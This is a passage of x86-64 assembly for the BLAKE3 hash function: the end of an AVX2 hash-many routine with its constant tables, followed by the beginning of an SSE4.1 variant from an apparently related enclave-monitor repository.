mov qword ptr [rbp+0x50], rbx
sub rsi, 8
cmp rsi, 8
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x2A0]
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
test rsi, 0x4
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovdqa ymm8, ymm0
vmovdqa ymm9, ymm1
vbroadcasti128 ymm12, xmmword ptr [rsp+0x240]
vbroadcasti128 ymm13, xmmword ptr [rsp+0x260]
vpunpckldq ymm14, ymm12, ymm13
vpunpckhdq ymm15, ymm12, ymm13
vpermq ymm14, ymm14, 0x50
vpermq ymm15, ymm15, 0x50
vbroadcasti128 ymm12, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
vpblendd ymm14, ymm14, ymm12, 0x44
vpblendd ymm15, ymm15, ymm12, 0x44
vmovdqa ymmword ptr [rsp], ymm14
vmovdqa ymmword ptr [rsp+0x20], ymm15
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vmovups ymm2, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm2, ymm3, 136
vshufps ymm5, ymm2, ymm3, 221
vmovups ymm2, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm2, ymm3, 136
vshufps ymm7, ymm2, ymm3, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
vmovups ymm10, ymmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x40], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x30], 0x01
vshufps ymm12, ymm10, ymm11, 136
vshufps ymm13, ymm10, ymm11, 221
vmovups ymm10, ymmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x20], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x10], 0x01
vshufps ymm14, ymm10, ymm11, 136
vshufps ymm15, ymm10, ymm11, 221
vpshufd ymm14, ymm14, 0x93
vpshufd ymm15, ymm15, 0x93
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
vpbroadcastd ymm2, dword ptr [rsp+0x200]
vmovdqa ymm3, ymmword ptr [rsp]
vmovdqa ymm11, ymmword ptr [rsp+0x20]
vpblendd ymm3, ymm3, ymm2, 0x88
vpblendd ymm11, ymm11, ymm2, 0x88
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa ymm10, ymm2
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm8, ymm8, ymm12
vmovdqa ymmword ptr [rsp+0x40], ymm4
nop
vmovdqa ymmword ptr [rsp+0x60], ymm12
nop
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm5
vpaddd ymm8, ymm8, ymm13
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vmovdqa ymmword ptr [rsp+0x80], ymm5
vmovdqa ymmword ptr [rsp+0xA0], ymm13
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x93
vpshufd ymm8, ymm8, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x39
vpshufd ymm10, ymm10, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm8, ymm8, ymm14
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm7
vpaddd ymm8, ymm8, ymm15
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x39
vpshufd ymm8, ymm8, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x93
vpshufd ymm10, ymm10, 0x93
dec al
je 9f
vmovdqa ymm4, ymmword ptr [rsp+0x40]
vmovdqa ymm5, ymmword ptr [rsp+0x80]
vshufps ymm12, ymm4, ymm5, 214
vpshufd ymm13, ymm4, 0x0F
vpshufd ymm4, ymm12, 0x39
vshufps ymm12, ymm6, ymm7, 250
vpblendd ymm13, ymm13, ymm12, 0xAA
vpunpcklqdq ymm12, ymm7, ymm5
vpblendd ymm12, ymm12, ymm6, 0x88
vpshufd ymm12, ymm12, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymmword ptr [rsp+0x40], ymm13
vmovdqa ymmword ptr [rsp+0x80], ymm12
vmovdqa ymm12, ymmword ptr [rsp+0x60]
vmovdqa ymm13, ymmword ptr [rsp+0xA0]
vshufps ymm5, ymm12, ymm13, 214
vpshufd ymm6, ymm12, 0x0F
vpshufd ymm12, ymm5, 0x39
vshufps ymm5, ymm14, ymm15, 250
vpblendd ymm6, ymm6, ymm5, 0xAA
vpunpcklqdq ymm5, ymm15, ymm13
vpblendd ymm5, ymm5, ymm14, 0x88
vpshufd ymm5, ymm5, 0x78
vpunpckhdq ymm13, ymm13, ymm15
vpunpckldq ymm14, ymm14, ymm13
vpshufd ymm15, ymm14, 0x1E
vmovdqa ymm13, ymm6
vmovdqa ymm14, ymm5
vmovdqa ymm5, ymmword ptr [rsp+0x40]
vmovdqa ymm6, ymmword ptr [rsp+0x80]
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
vpxor ymm8, ymm8, ymm10
vpxor ymm9, ymm9, ymm11
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqu xmmword ptr [rbx+0x40], xmm8
vmovdqu xmmword ptr [rbx+0x50], xmm9
vextracti128 xmmword ptr [rbx+0x60], ymm8, 0x01
vextracti128 xmmword ptr [rbx+0x70], ymm9, 0x01
vmovaps xmm8, xmmword ptr [rsp+0x280]
vmovaps xmm0, xmmword ptr [rsp+0x240]
vmovaps xmm1, xmmword ptr [rsp+0x250]
vmovaps xmm2, xmmword ptr [rsp+0x260]
vmovaps xmm3, xmmword ptr [rsp+0x270]
vblendvps xmm0, xmm0, xmm1, xmm8
vblendvps xmm2, xmm2, xmm3, xmm8
vmovaps xmmword ptr [rsp+0x240], xmm0
vmovaps xmmword ptr [rsp+0x260], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test rsi, 0x2
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp+0x240]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x244]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x264], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
vbroadcasti128 ymm14, xmmword ptr [ROT16+rip]
vbroadcasti128 ymm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x200]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovaps ymm8, ymmword ptr [rsp+0x280]
vmovaps ymm0, ymmword ptr [rsp+0x240]
vmovups ymm1, ymmword ptr [rsp+0x248]
vmovaps ymm2, ymmword ptr [rsp+0x260]
vmovups ymm3, ymmword ptr [rsp+0x268]
vblendvps ymm0, ymm0, ymm1, ymm8
vblendvps ymm2, ymm2, ymm3, ymm8
vmovaps ymmword ptr [rsp+0x240], ymm0
vmovaps ymmword ptr [rsp+0x260], ymm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test rsi, 0x1
je 4b
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm3, dword ptr [rsp+0x240]
vpinsrd xmm3, xmm3, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm3, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm14, xmmword ptr [ROT16+rip]
vmovdqa xmm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vmovdqa xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa xmm3, xmm13
vpinsrd xmm3, xmm3, eax, 3
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
ADD1:
.long 8, 8, 8, 8, 8, 8, 8, 8
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A
|
mit-enclaves/argos-monitor | 61,143 | C/libraries/sdktyche/loader/blake3_sse41_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse41
.global _blake3_hash_many_sse41
.global blake3_compress_in_place_sse41
.global _blake3_compress_in_place_sse41
.global blake3_compress_xof_sse41
.global _blake3_compress_xof_sse41
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse41:
blake3_hash_many_sse41:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
